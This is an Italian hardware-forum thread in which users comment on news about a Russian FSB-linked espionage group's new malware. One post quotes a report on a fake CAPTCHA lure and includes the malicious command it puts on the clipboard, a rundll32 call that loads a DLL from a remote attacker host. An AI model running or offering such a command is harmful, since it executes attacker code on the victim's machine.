|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#1 |
|
www.hwupgrade.it
Iscritto dal: Jul 2001
|
Link alla notizia: https://www.hwupgrade.it/news/sicure...pc_145158.html
Il collettivo di cyber-spionaggio legato all’FSB russo ha introdotto nuove famiglie di malware in catene di attacco sempre più sofisticate, evolvendosi rapidamente dopo la scoperta del precedente LostKeys Click sul link per visualizzare la notizia. |
|
|
|
|
|
#2 |
|
Senior Member
Iscritto dal: Oct 2008
|
Sì vabbe', ma...
..."When the user clicks the checkbox, the embedded JavaScript code copies a malicious command (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) to the user’s clipboard. Next, the page displays UI elements designed to prompt the user to paste and execute this command in the Windows Run dialog box"
Qua mi sembra siamo un po' oltre l'utente che apre un allegato di posta malevolo. |
|
|
|
|
|
#3 | ||
|
Senior Member
Iscritto dal: Sep 2013
Città: Hardware Upgrade
|
Quote:
Quote:
|
|
|
|
#4 | |
|
Senior Member
Iscritto dal: Sep 2005
Città: Roma
|
Quote:
CPU Intel Core i5-13600K GPU NVIDIA RTX 4080 FE 16GB MOBO MSI MAG Z690 Tomahawk COOLER Noctua NH-D15 chromax.black RAM Corsair Vengeance LPX 32GB DDR4-3200 CL16 NVMe Samsung 970 Evo Plus 1TB PSU Corsair RM1000x CASE Fractal North Charcoal NOTE gYwLW3ZvOkk |
|
|
|
|
|
|
#5 | |
|
Member
Iscritto dal: Aug 2005
|
Quote:
in effetti devi essere un po' rincoglionito per incollare i comandi che ti dicono i popup nella fiunestra esegui |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 17:25.